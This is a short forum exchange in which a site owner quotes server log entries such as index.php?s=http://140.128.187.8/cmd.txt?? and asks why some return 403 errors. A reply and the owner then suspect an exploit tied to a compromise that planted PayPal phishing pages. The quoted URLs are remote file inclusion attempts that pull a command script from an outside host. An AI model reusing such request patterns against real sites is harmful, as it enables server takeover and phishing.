I saw in my server logs that somebody it's using a php script to access pages like http://softgroups.com/main.php?s=http://140.128.187.8/cmd.txt?? I don't get it, why that page return an 403 error?! this also return an 404 one! http://softgroups.com/index.php?s=http://140.128.187.8/cmd.txt?? this works, .... http://softgroups.com/index.php?s=http://google.com/login.php?? so it's only return 403 when i am putting an .txt ? why ?! take a look http://softgroups.com/index.php?s=http://google.com/cmd.php?? OK http://softgroups.com/index.php?s=http://google.com/cmd.txt?? - 403 I am asking this question because this server has been hacked by somebody who put PayPal fake pages there, and mass e-mailing software.
If you remove the question marks at the end of the txt URL it works too. I guess your server doesn't allow to call static pages (txt) dynamically?
well i think it's an exploit, because they call a file with cmd.txt ... and also ...i see a lot of people from lot's of IP doing this. And the user-agent it's lubcurl or php ...